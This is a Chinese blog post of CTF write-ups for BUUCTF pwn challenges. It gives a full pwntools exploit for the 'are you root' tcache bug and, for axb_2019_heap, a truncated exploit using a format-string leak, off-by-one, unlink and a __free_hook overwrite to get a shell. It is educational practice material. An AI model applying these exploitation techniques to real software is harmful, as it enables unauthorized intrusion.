BUUCTF-PWN刷题记录-6

最新推荐文章于 2024-04-08 21:33:35 发布
最新推荐文章于 2024-04-08 21:33:35 发布
阅读量826 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: 信息安全 指针 字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/105482269
版权

目录

picoctf_2018_are you root(程序逻辑错误)

在这里插入图片描述
例行安全检查
菜单如下:
在这里插入图片描述
我们需要auth_level等于5才能get flag

user结构体如下

struct USER{
   
	char *name;
	long long auth_level;
}

漏洞原理分析:
在这里插入图片描述
在login中分配了两次内存,第一次是存储user结构体,第二次是存储姓名
在这里插入图片描述
在reset中只是释放了name,并在name的地址置为空,此时该chunk进入tcache,下次login时还会再申请一次user结构体,此时名字中超过8字节的部分就被当成auth_level了

漏洞利用:
我们先login一下,查看分配的内存

在这里插入图片描述
然后reset,再重新登陆
在这里插入图片描述
在这里插入图片描述
发现名字中超过8字节的部分被当做了auth_level
在这里插入图片描述

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 27815)
#r = process('./PicoCTF_2018_are_you_root')

DEBUG = 0
if DEBUG:
    gdb.attach(r, 
    ''' 
    b *0x400E46
    b *0x400AF5
    c
    ''')

r.recvuntil('> ')
r.sendline('login aaaaaaaa\x05')
r.recvuntil('> ')
r.sendline('reset')
r.recvuntil('> ')
r.sendline('login root')
r.recvuntil('> ')
r.sendline('get-flag')
r.interactive()

axb_2019_heap(格式化字符串,off-by-one,unlink)

在这里插入图片描述
漏洞分析:
banner中的格式化字符串漏洞
在这里插入图片描述
get_input中可以溢出一个byte(任意byte而不是’\x00‘)
在这里插入图片描述

漏洞利用:

  1. 利用格式化字符串漏洞泄露Libc地址和代码段地址
  2. 申请三个大小为8的奇数倍的note,第三个内容为/bin/sh
  3. 编辑note[0],伪造chunk,fd为bss上的note数组地址-0x18,bk位bss上note数组地址-0x10,并修改下一个chunk的presize和size
  4. 释放note[1],此时通过unlink欺骗note[0]中存储地址为数组地址-0x18
  5. edit note[0],把note[0]content的地址改为__free_hook,修改__free_hook为system地址并释放note[2]

Exp:

from pwn import *

r = remote("node3.buuoj.cn", 28423)
#r = process("./axb_2019_heap")

context.log_level = 'debug'

elf = ELF("./axb_2019_heap")
libc = ELF('./libc/libc-2.23.so')

def add(index, size, content):
	r.recvuntil(">> ")
	r.sendline('1')
	r.recvuntil("Enter the index you want to create (0-10):")
	r.sendline(str(index))
	r.recvuntil("Ente
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-24 & libc-2.29学习(下)
weixin_44145820的博客
05-29 1007
目录[2020 新春红包题]3 [2020 新春红包题]3
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1344
构造payload:变量声明后顺序入,每个标识表示变量所占空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要对齐,在执行system时有一个指令需要对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
CTF-PWN学习-为缺少指导的同学而生_ctf pwn,开源至上
最新发布
QAZZHONGYI的博客
04-08 723
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4867
BUU CTF PWN 入门知识详解
picoctf_2018_are you root
m0_51251108的博客
11-04 176
picoctf_2018_are you root: 参考博客: ha1vk 程序功能到达level5能打出flag,正常运行的话不会让你到达level5 login功能: strdup()在内部调用了malloc()为变量分配内存 返回一个指针,指向为复制字符串分配的空间 可以看到是申请了两个chunk,且我们的level参数就存在后面 直接说解法: 就是输name的我们填满8个a,然后就可以改到level参数 strdup会把name copy下去,包括level参数,我们free它的话,释放到tc
[buuctf]picoctf_2018_are you root未初始化漏洞
weixin_46521144的博客
04-02 283
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个未初始化漏洞。我画个帧大家就明白了 先写一下函数长什么样 帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF题目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 1043
BUUCTF题目Rverse & Pwn部分的writeup(持续更新)
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1002
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 2023
经典溢出漏洞。
CTF-SSH私钥泄露
bgyuan_csdn的博客
08-21 261
第一步, nmap -sV 192.168.0.1 扫描 服务信息 找到已经打开的端口。 第二步, 浏览器 192.168.0.1:31337 探看页面源代码。 找到可能的隐藏的文件。 第三步, 探测端口信息 dirb http://192.168.0.1:31337/ 别忘了最后的"/" 可以探测到隐藏的文件(浏览不到的文件) 第...
i春秋CTF训练 Web who are you?
椰奶冻不安全的博客
06-30 610
Web who are you? 题目内容:http://106.75.72.168:2222/ 我是谁,我在哪,我要做什么? 在文件头发现了Cookie role=Zjo1OiJ0aHJmZyI7 将Zjo1OiJ0aHJmZyI7base64解码得到f:5:"thrfg";使用凯撒密码爆破thrfg发现其位移13位是guest 故可以用admin的rot-13:nqzva,构造f:5:"nqzva"然后base64加密Zjo1OiJucXp2YSI= 用burpsuit抓包改cookie得到
CTF 2019-7-26 笔记
weixin_40328085的博客
07-27 256
第一步, nmap -sV 192.168.0.1 扫描 服务信息 找到已经打开的端口。 第二步, 浏览器 192.168.0.1:31337 探看页面源代码。 找到可能的隐藏的文件。 第三步,探测端口信息 dirb http://192.168.0.1:31337/ 别忘了最后的"/" 可以探测到隐藏...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3656
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值